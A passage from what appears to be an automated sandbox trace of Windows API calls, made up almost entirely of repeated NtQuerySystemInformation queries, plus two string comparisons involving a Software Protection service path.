SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x28, ResultLength=0x0) [0280.666] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0280.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0280.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0280.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x28, ResultLength=0x0) [0280.747] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x28, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x38, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x20, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0280.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0280.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, 